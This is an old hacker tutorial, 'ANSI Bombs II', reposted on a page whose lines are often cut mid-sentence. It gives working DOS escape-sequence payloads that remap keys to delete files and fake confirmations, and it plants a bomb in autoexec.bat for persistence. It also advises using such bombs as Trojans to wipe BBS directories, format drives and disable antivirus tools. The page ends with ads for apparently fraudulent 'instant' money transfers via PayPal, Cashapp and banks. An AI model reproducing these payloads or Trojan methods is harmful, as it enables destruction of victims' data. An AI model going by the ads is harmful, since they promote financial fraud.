ANSI Bombs II: Tips and Techniques From alphabanklogs.com
ANSI Bombs II: Tips and Techniques.
I. Introduction
little planning deliver some degree of success. ANSI bombing can be dangerous, so I am tired of hearing people say that an ANSI bomb is harmless, another misconception I hope to clear up. Now, most people that have spent time experimenting with ANSI bombs probably know most of the material in this file, but it might be fun just to read anyway.
2. Misconceptions
lines, but most comm programs don’t use ANSI.SYS; they use their own version of ANSI, which doesn’t support key redefinition. Some people might have a program that supports it, but I haven’t seen it yet. I have tested bombs on systems on my own and proved to myself that they don’t work.
thing other then ANSI. I have a few friends that are working on “A Better ANSI” for PDers, which, instead of being better, really screws them over.
3. An Overview
In ANSI everything is done with a system of escape codes. Key redefinition is one of those codes. (From now, whenever I say ESC, I really mean the arrow, ). Here is a basic command:
ESC [13;27p
of the definition, and the “p” signifies the end. Whenever you want a key pressed, you have to use it’s numerical code (i.e. 13 is the code for <Enter>).
to become a string (i.e. ESC [13;”Blah”p would make <Enter> say
“Blah”). Strings must be inside of quotes, which includes commands
that you want typed on the DOS prompt (i.e. ESC [13;”Del *.*”;13p
would delete everything in the directory, note that 13 stands for
Enter in this case, not the redefinition).
as many commands as you want in it, but each one has to be separated
by a semi-colon. You can only redefine one key in each escape code,
so if you want to redefine another key, you have to start another
escape code. That’s about it when it comes to bombs, now that you
have the basics, all you really need is a little imagination.
4. Tips and Tricks
A. The Y/N Redefinition
Now, here’s a simple but fun little ANSI bomb:
ESC [78;89;13p ESC [110;121;13p
Basically, all this does is turn a capital “N” into “Y” and a
lower-case “n” into “y”. Alone this doesn’t do too much, except for
screw around with what they are typing. On the other hand, try adding
this line of code to the ANSI bomb:
ESC [13;27;13;”del *.*”;13p
Most people would automatically press “N” when they see “Del *.*”,
but when they do, they will be screwed over. This portion of a bomb
is very useful when it comes to making good bombs.
B. Screwing with the Autoexec.bat
bombing projects:ESC [13;27;13;”copy bomb.ans c:\”;13;”copy con
c:\autoexec.bat”;13;”type bomb.ans”;13;0;109;
13;”cls”;13p
This line of code makes the bomb a little more permanent and a
little more dangerous. It copies the bomb into the root directory,
then it change/creates the autoexec.bat, so the bomb is typed after
every boot-up. Of course, the person could just boot off a disk, but
I’m sure this would get them a few time. It could also probably
appear as though it were a virus, scaring the shit out of the owner of
the computer.
C. Turning Commands into Other Commands
redefine commands. That way if they type in “copy”, it will turn into
“Del *.*”. Since you can’t actually change the whole string, you have
to take a different approach. You have to change a few of the keys,
so when typed, they type and execute the desired command. I guess it
would be coolest to have to command exactly the same length; that way
you could redefine one key at a time to obtain the desired effect.
It doesn’t really matter how you do it, just as long as it works. You
might make an ANSI that says “Wow, check out what this bomb did to
your directory”, and then have it redefine the keys, so when they type
in “dir”, it turns into “del”. I think you get the idea.
D. Trojans
think so, but ANSI bombs can be used as Trojans and in Trojans. First,
if you are planning on crashing a board, but you’re not very good at
programming, then make yourself an ANSI bomb.
which directory the main files for running the BBS are stored. They
are usually under the name BBS or the name of the software, like WWIV
or Telegard. Then, make a bomb that either just deletes all the files
in that directory, or if you want the board to be down a longer time,
then make one that formats the Hard Drive. In this form ANSI bombs,
if they are well planned out, can be easy to make Trojans. Second,
ANSI bombs can used in Trojans. ANSI Bombs II: Tips
little, but say you wanted to write a Trojan that would delete a
directory, every time you typed a certain key, then you could use an
ANSI bomb. First make some batch and com/exe files that would search
for protecting programs like Norton and turn them off. Then you could
copy the file into the root directory, along with your versions of
autoexec.bat, config.sys, ANSI.sys, and whatever else. (To make it
look more realistic make the files Resource.00x to trick the user,
then when copying, use the real name). ANSI Bombs II: Tips
up or do a warm boot through some pd program, which is easily attain
able. When the computer loads back up, you can screw that shit out of
them with your ANSI bomb.
5. Conclusion
and to others that they are stupid or lame. Personally, I think that
ANSI bombs are just plain old fun. They’re not too hard to make, but
there is a lot that you can do with them. They are nowhere near as
malicious as virii, so if you’re looking for unstoppable destruction,
look elsewhere, but they do serve their purpose. I know that there
are programs out there that help you program ANSI bombs, but I think
that they kind of take the fun out of them. Probably, some day soon,
I’ll quit making ANSI bombs and start looking more into virii and pure
Trojans. But for now, ANSI bombs suit my purpose.-TRG
Appendix A: Key Code Program
it up, it tells you the numeric code for every key you type in. Spe
cial means that it is in the extended set and therefore uses zero, and
“q” ends the program. Unfortunately, I can’t take any credit for
this program. I got it over the phone from Heavymetl, and it was made
by his brother. So many thanks go out to Heavymetl and his brother,
even though they’ll probably be a little pissed at me for including
this in my file. It is in Pascal and can be compiled in most Turbo
Pascal compilers.Use CRT;
Var
CH : CHAR;
Begin
Repeat
CH := ReadKey;
If CH = #0 then
Begin
CH := ReadKey;
WriteLn(CH,'(Special) – ‘,ORD(CH));
End
Else
WriteLn(CH,’ – ‘,ORD(CH));
Until
CH = ‘q’;
End.
You can also buy instant:
Cashapp Money Transfer Click here
Paypal Money Transfer Click here
Western Union Money Transfer Click here
Venmo Money Transfer Click here
Bank Money Transfer Click here to Contact Us